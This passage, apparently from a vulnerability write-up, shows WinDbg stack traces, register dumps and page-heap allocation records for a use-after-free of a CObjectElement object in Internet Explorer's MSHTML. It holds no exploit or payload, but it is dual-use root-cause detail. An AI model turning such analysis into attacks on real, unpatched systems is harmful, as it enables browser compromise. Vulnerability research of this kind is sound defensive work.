758814ad kernel32!HeapFree+0x0014
6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x0122
6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x0023
6dfce0db MSHTML!CElement::PrivateRelease+0x027e
6d98953d MSHTML!CObjectElement::DeferredFallback+0x033d
6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x017b
6d95577e MSHTML!GlobalWndProc+0x012e
770762fa user32!InternalCallWinProc+0x0023
77076d3a user32!UserCallWinProcCheckWow+0x0109
770777c4 user32!DispatchMessageWorker+0x03bc
7707788a user32!DispatchMessageW+0x000f
6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x0464
6ec38de8 IEFRAME!LCIETab_ThreadProc+0x03e7
76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x0067
747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x0094
7588336a kernel32!BaseThreadInitThunk+0x000e
77dc9882 ntdll!__RtlUserThreadStart+0x0070
77dc9855 ntdll!_RtlUserThreadStart+0x001b

We can see that a freed CObjectElement object is accessed in the
MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the
memory just before the CObjectElement destructor is called, we can see where
the object was initially allocated.

0:007> bu MSHTML!CObjectElement::~CObjectElement
0:007> g
Breakpoint 0 hit
eax=6daf6b10 ebx= ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324
eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0 nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=0287
MSHTML!CObjectElement::~CObjectElement:
0:007> !heap -p -a poi(@esp+4)
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in busy allocation (  DPH_HEAP_BLOCK: UserAddr UserSize -   
  VirtAddr VirtSize)
 9b01f04:  9b09e90  170 -   
   9b09000 2000
  MSHTML!CObjectElement::`vftable'
74808e89 verifier!AVrfDebugPageHeapAllocate+0x0229
77e6134e ntdll!RtlDebugAllocateHeap+0x0030
77e1b16e ntdll!RtlpAllocateHeap+0x00c4
77dc2fe3 ntdll!RtlAllocateHeap+0x023a
6daf6a27 MSHTML!CObjectElement::CreateElement+0x0017
6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x00b8
6df17172 MSHTML!CHtmParse::ParseToken+0x0096
6df16a0f MSHTML!CHtmPost::ProcessTokens+0x04c7
6dd8341b MSHTML!CHtmPost::Exec+0x0207
6da308a8 MSHTML!CHtmPost::Run+0x003d
6da3080e MSHTML!PostManExecute+0x0061
6da2727c MSHTML!PostManResume+0x007b